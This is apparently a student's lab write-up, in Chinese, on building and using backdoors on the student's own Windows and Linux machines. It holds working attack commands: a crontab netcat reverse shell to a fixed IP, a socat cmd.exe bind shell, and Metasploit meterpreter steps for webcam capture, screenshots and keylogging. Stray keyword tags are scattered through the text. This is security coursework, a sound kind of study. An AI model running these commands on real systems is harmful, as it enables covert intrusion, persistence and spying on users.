返回目录html
问题一:运行可执行文件时在已关防火墙的状态下被Windows当成木马拦截:拒绝访问。
linux
解决一:除了控制面板里关掉防火墙,win10里内置的Windows Defender也要关闭,当时没有发现还有这个...若是依然拒绝访问的话,能够添加排除项...在屡次尝试失败后,还能够右键可执行文件->属性->安全->编辑权限。从新生成和传送后就能够运行了~
web
问题二:报错Cannot allocate memory
。
shell
解决二:这个报错的直译是:没法分配内存。我想到了是由于内存不足,因此设置虚拟机的内存为4G(要分配的比原先大),解决问题。vim
跟着老师的实验指导和学姐学长们的经验博客,完成本次实验其实很容易。此次实验帮助我掌握了后门的原理,也让我在一次次利用后门的攻击中有了更直观的感觉(可能还有一丝丝成功攻击了本身主机的兴奋...??)。从此必定要加强安全防范意识,按期查杀,以避免本身的隐私和电脑控制权落入他人之手。windows
返回目录安全
ipconfig
ifconfig -a(显示所有接口信息)
ncat.exe -l -p 5309
监听5309端口在Linux环境下,用crontab -e
指令编辑定时任务,选择基本的vim编辑器("3")
网络
08 * * * * /bin/netcat 10.43.34.219 5309 -e /bin/sh
(这里的IP地址为Win攻击机的IP)并 :wq!
保存退出。在8分以前,Win里输入指令,屏幕上没有反应,当8分时,Win就得到了Linux的shell,指令的内容则显示了出来:
tcp
tcp-listen:5309 exec:cmd.exe,pty,stderr
,把cmd.exe绑定到端口5309,同时将stderr重定向到stdout上:win+L
锁定计算机,建立的任务就开始运行了。socat - tcp:172.30.1.13:5309
,发现成功得到了Win的cmd shell:msfconsole
指令进入msf控制台。use exploit/multi/handler
使用监听模块,设置payload。set payload windows/meterpreter/reverse_tcp
使用和生成后门程序时相同的payload,而后设置IP和端口号:webcam_snap
获取目标主机摄像头:screenshot
获取目标主机的截屏:getuid
查看当前目标主机用户:keyscan_start
记录击键的过程,使用keyscan_dump
读取击键记录:返回目录编辑器